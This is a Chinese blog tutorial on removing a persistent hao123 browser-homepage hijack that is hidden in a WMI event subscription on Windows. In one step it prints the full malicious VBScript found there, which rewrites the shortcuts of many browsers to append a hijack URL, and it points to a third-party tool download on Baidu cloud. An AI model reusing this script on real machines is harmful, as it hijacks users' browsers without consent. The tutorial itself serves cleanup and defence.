教程：浏览器首页被hao123劫持的解决方法

令狐冲

个人很喜欢用chrome，不过，这两天打开chrome时，首页总是默认打开hao123首页，chrome设置里是空白页。后来发现浏览器打开的瞬间被一闪重启了下，然后就会出现hao123，很明显被劫持了，开始寻找解决办法。首先，修改了chrome的锁定主页，测试后完全不管用。然后，删除chrome快捷方式，找到C盘安装目录下chrome.exe,双击打开后首页正常，重新建了一个快捷方式到桌面，再次打开chrome，首页也是正常。不过，事情并没有这么简单，关机重启后，还是会被hao123劫持。于是，开始谷歌解决办法，最终用以下方法解决了劫持，特别写了此篇文章，做个笔记，供后来人参考一下。以下是解决办法：

问题描述：

（1）电脑内安装的Chrome浏览器的首页都变成了 http://hao.169x.cn/或者http://hao.549x.cn/等等 ，然后跳转到 hao123；

（2）发现浏览器的快捷方式中的“目标”中被追加了一串 http://hao.169x.cn/ ，手动删除这些内容后，下次开机会恢复回来；

（3）尝试了网上的一些解决办法，例如禁用 Windows激活软件的服务（如 KMS 或 OEM 等），或者使用各类软件管家软件禁用了某些任务计划，然而这些服务/计划并不存在或者已经禁用了，从而导致问题仍然无法彻底解决。

1.右键点开你桌面上的浏览器快捷方式，选“属性”，看一下“目标(T):”这一栏，在浏览器地址后面是不是还跟了其它东西，像这样(这里可能是169或549等劫持，反正是不正常的)：

正常情况是这样的：

2.下载并安装wmi tool

链接: https://pan.baidu.com/s/1pKWWwxd

密码: bpih

3.从开始菜单依次打开WIM Tools -> WIM Event Viewer，打开后如下图示。单击左上角按钮。

4.接下来可能出现下图所示界面。如有，点击下图中圈选的按钮，否则将直接出现 5

中界面：

5.在下图界面中单击“Connect”按钮：

6.在弹出窗后中单击“OK”按钮：

7.单击“root”前加号，展开后选中“CIMV2”，结果如图示：

8.在接下来弹出的对话框中选择“OK”：

9.进入了下图所示界面，单击__EventFilter前加号，得到如下结果：

10.双击名为上图中选中的项，单击下图所示“Script Text”行“Value”列对应的单元格并仔细浏览，能够发现hao.169x.cn的踪迹：

如果将该单元格中内容复制出来，得到如下代码：

• On Error Resume Next:Const link = "http://hao169.com/?r=v&m=4":Const link360 = "http://hao169.com/?r=v&m=4&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:Users        iandDesktop,C:Users        iandAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:Users        iandAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:Users        iandAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:Users        iandAppDataRoamingMicrosoftWindowsStart MenuPrograms":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
  

11.返回步骤 9，右击 9 中选中项，选择“Delete instance”后关闭该窗口：

12.至此，算是找到了问题的根源，但是之前已经造成的破会仍需要手动修复，也就是需要手动修复被篡改的浏览器快捷方式。各种浏览器的修复方式相同，在此以Internet Explorer的修复为例，修复其他浏览器也是通过修改快捷方式的办法实现。
从开始菜单找到Internet Explorer，右击该快捷方式，在“快捷方式”选项卡的“目标”一行中删除（如果有）http://hao.169x.cn开头的一串文字，如下图所示。然后“确定”。

13.最后,用杀毒软件进行全盘扫描（国产的比较流氓，大家注意下！），以实现彻底清除木马病毒的目的。